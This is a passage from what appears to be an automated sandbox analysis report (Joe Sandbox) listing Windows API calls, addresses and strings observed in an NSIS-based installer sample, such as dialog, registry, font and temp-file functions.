                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID:
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                        • GetMessagePos.USER32 ref: 00404ED4
                                                        • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                        Strings
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00403001
                                                        • wsprintfW.USER32 ref: 00403011
                                                        • SetWindowTextW.USER32(?,?), ref: 00403021
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 0040300B
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                        • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                        • CharNextW.USER32(?,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                        • CharPrevW.USER32(?,?,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        Strings
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: *?|<>/":
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                        • wsprintfW.USER32 ref: 0040694D
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                        Strings
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017D5
                                                        • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017FA
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID:
                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                        • GetClientRect.USER32(?,?), ref: 00401E0A
                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                        • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E76
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
                                                        • API String ID: 3808545654-0
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                        • wsprintfW.USER32 ref: 00404E4D
                                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        APIs
                                                        • DestroyWindow.USER32(?,00000000,0040321C,00000001), ref: 00403051
                                                        • GetTickCount.KERNEL32 ref: 0040306F
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                        • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        APIs
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(?,?,0042F270,?,00405F65,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800,0043F000), ref: 00405EFF
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                        • lstrlenW.KERNEL32(0042F270,00000000,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800,0043F000), ref: 00405FA7
                                                        • GetFileAttributesW.KERNEL32(0042F270,0042F270,0042F270,0042F270,0042F270,0042F270,00000000,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800), ref: 00405FB7
                                                        Strings
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: 4ou
                                                        • API String ID: 3248276644-1612631989
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040559F
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                          • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004060B4
                                                        • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403550,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040383C), ref: 004060CF
                                                        Strings
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: nsa
                                                        • API String ID: 1716503409-2209301699
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                        • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0